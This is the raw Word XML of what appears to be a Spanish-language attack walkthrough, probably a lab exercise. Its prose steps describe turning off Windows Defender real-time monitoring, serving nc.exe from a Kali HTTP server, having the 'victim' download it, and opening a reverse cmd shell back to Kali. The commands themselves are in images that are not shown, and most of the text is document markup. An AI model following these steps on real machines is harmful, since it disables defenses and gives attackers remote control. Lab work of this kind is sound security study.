        <w:t xml:space="preserve"> $true: Desactiva la monitorización en tiempo real del antivirus Windows Defender.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F02D20" w14:textId="60F96FE8" w:rsidR="00ED7766" w:rsidRDefault="00ED7766" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED7766">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F0D9C64" wp14:editId="72EA42E6">
            <wp:extent cx="5760720" cy="21215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F1DE" w14:textId="35394CF5" w:rsidR="009D4F05" w:rsidRDefault="009D4F05" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ahora </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>si</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> desactivamos el Windows Defender , necesitamos que la victima descargue nc.exe </w:t>
      </w:r>
      <w:r w:rsidR="004E65AC">
        <w:t xml:space="preserve">, primero debemos subir un servidor http en Kali para que la victima lo descargue </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80CAD4" w14:textId="716E4417" w:rsidR="00ED7766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6FDF350E" wp14:editId="73C1EB56">
            <wp:extent cx="5760720" cy="19627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1E51" w14:textId="724A2ECA" w:rsidR="00E438F7" w:rsidRDefault="00E438F7" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E438F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131E9B86" wp14:editId="18411A01">
            <wp:extent cx="5410955" cy="62873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8C8" w14:textId="77AB36B4" w:rsidR="004E65AC" w:rsidRDefault="004E65AC" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Antes de que la victima lo descargue necesitamos crear una </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>carpeta ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ya que vamos a guardar el archivo descargado en C:\\  y este no permite descargar cosas directamente</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C53FB20" w14:textId="61B4EBBF" w:rsidR="00E438F7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37D9B29D" wp14:editId="0214595D">
            <wp:extent cx="5760720" cy="19018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99C" w14:textId="7E5E88FA" w:rsidR="00E438F7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37288129" wp14:editId="292F7B40">
            <wp:extent cx="5760720" cy="30835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D1D" w14:textId="28CD584E" w:rsidR="004E65AC" w:rsidRDefault="004E65AC" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después de crear la carpeta verificamos que se creo </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>correctamente ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ahora vamos a descargar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> y lo vamos aguardar en esa ruta </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC3D5AB" w14:textId="0C3A42AB" w:rsidR="00E438F7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2ACA44D1" wp14:editId="24E8A623">
            <wp:extent cx="5760720" cy="21450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4535" w14:textId="68C16972" w:rsidR="00E438F7" w:rsidRDefault="00E438F7" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E438F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58590047" wp14:editId="6F74416C">
            <wp:extent cx="5760720" cy="29375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34B2" w14:textId="23DE3509" w:rsidR="004E65AC" w:rsidRDefault="004E65AC" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Después de verificar que se </w:t>
      </w:r>
      <w:r w:rsidR="002D0799">
        <w:t>descargó</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> correctamente </w:t>
      </w:r>
      <w:r w:rsidR="002D0799">
        <w:t xml:space="preserve">y que se encuentra en esa ruta vamos a ejecutar ese comando </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7A9E87" w14:textId="1EA55158" w:rsidR="00E438F7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6A0553EC" wp14:editId="5DF6D440">
            <wp:extent cx="5760720" cy="3597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63DA" w14:textId="1DBAF338" w:rsidR="002D0799" w:rsidRDefault="002D0799" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En este comando decimos que se </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>va  a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> crear una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del Kali por el puerto especificado , luego de escuchar en Kali por ese puerto , ya tenemos una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd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la maquina victima , verificamos con un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7516FBF9" w14:textId="7F4484AF" w:rsidR="00E438F7" w:rsidRDefault="00E438F7" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E438F7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A33653" wp14:editId="0597FBF3">
            <wp:extent cx="4926132" cy="209871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885" cy="21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FE3" w14:textId="77777777" w:rsidR="00ED7766" w:rsidRPr="007663FA" w:rsidRDefault="00ED7766" w:rsidP="007663FA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C588F5" w14:textId="7DDA72D7" w:rsidR="007663FA" w:rsidRDefault="00C72709">
      <w:r w:rsidRPr="00C72709">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363F557E" wp14:editId="491676DA">
            <wp:extent cx="5760720" cy="39160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6A7" w14:textId="6B3EB6C5" w:rsidR="00C72709" w:rsidRDefault="00C72709">
      <w:r w:rsidRPr="00C72709">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FF690CF" wp14:editId="01580D95">
            <wp:extent cx="5760720" cy="21139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709" w:rsidSect="00337757">
      <w:pgSz w:w="12474" w:h="18711" w:code="5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1FB4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F43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FF144C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="970A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70"/>
    <w:rsid w:val="00073BC8"/>
    <w:rsid w:val="001B731D"/>
    <w:rsid w:val="00294170"/>
    <w:rsid w:val="002D0799"/>
    <w:rsid w:val="002D1B1F"/>
    <w:rsid w:val="00337757"/>
    <w:rsid w:val="004C7BF3"/>
    <w:rsid w:val="004E65AC"/>
    <w:rsid w:val="007663FA"/>
    <w:rsid w:val="009D4F05"/>
    <w:rsid w:val="00A258D9"/>
    <w:rsid w:val="00B15A37"/>
    <w:rsid w:val="00B72826"/>
    <w:rsid w:val="00BB3105"/>
    <w:rsid w:val="00C00680"/>
    <w:rsid w:val="00C2208F"/>
    <w:rsid w:val="00C72709"/>
    <w:rsid w:val="00CB5CB0"/>
    <w:rsid w:val="00CD1D8D"/>
    <w:rsid w:val="00D1395A"/>
    <w:rsid w:val="00DB7D65"/>
    <w:rsid w:val="00E438F7"/>
    <w:rsid w:val="00E53F89"/>
    <w:rsid w:val="00ED7766"/>
    <w:rsid w:val="00FC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DDEEB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6D65F4BA-A6F4-4F0F-AD1D-957D0AD57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636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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-25T11:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-25T11:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>